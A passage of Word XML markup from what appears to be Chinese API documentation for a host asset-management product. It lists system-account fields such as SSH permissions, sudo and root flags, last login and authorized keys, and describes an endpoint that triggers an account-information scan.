          <w:p w14:paraId="4DED17F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sshAcl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BBCED7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39EFCC4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7D4B10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>~./ssh访问权限, 如”777”, “666”，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06A652F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0147442A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260EABEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE613BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649015EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>帐号备注，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52AFC086" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C9CDDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastLoginTty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19EB3BA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705B46A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B1A910" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后登录终端，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="729E182C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B79BC4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastLoginIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4839DE31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0DE02E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025E3183" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后登录ip，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3669F98C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="361248EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768456BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E002B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="778B4F31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>帐号到期时间，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0179AA79" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A973552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>expired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E54CE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C30F28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E294CF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否过期</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F5E6632" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="338D8D2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fullName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586D80B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BEFC681" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389F391A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户全名，仅Windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AFE8012" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73837E80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>sudoAccesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1698FBC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FEA2FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>shell：varchar(128) user：varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14BF53CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sudo权限 shell:权限 user:用户权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E74978C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6083E68A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F301838" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="331DFF40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D60B1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否是root，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63469BF4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E6AB0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513CFFB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2B0232" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09001587" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户描述，仅Windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AC9E19A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D9DD86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F141727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C8F2DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0819A489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号类型 仅windows可用 0：访客用户 1：标准用户 2：管理员用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="441329E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE0B5E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastChangPwdTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00AE1F8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32FD4182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C6F78A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码最后修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="304FD101" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E3B976D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2D0AE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E077B95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401CEA28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账户登录方式，仅linux可用 0 不可登陆 1 key登陆 2 pwd登陆 3 key&amp;pwd登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F0373D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0111F05A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283E7022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E608E1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5938B1A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>交互登录方式，仅linux可用 0 不可登录 1 不可交互登录 2 可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="466C563D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="727FA65D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>passwordInactiveDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261E44E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724558C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="696AEF54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码过期后变成无效的天数，-1为无限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="389100AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45352B24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23C4DAC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52099779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5504E9FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否sudo权限，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="248DE9DC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD3B30F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>authorizedKeys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D89017F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0B1DB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>encryptType：varchar(512) comment：varchar(512) value：varchar(512) MD5：varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517F87EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号公钥信息，仅linux可用 encryptType：加密类型 comment：备注信息 value：公钥的值 MD5：MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73516C31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="系统账号信息扫描"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:t>系统账号信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B09AC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求系统账号信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D7079" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714098B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/account/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E83C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51819200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAF2BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF870A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/account/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C7C00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADDF19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54866B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB58386" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24837E8D"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796BEED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39ABD04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42521B78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
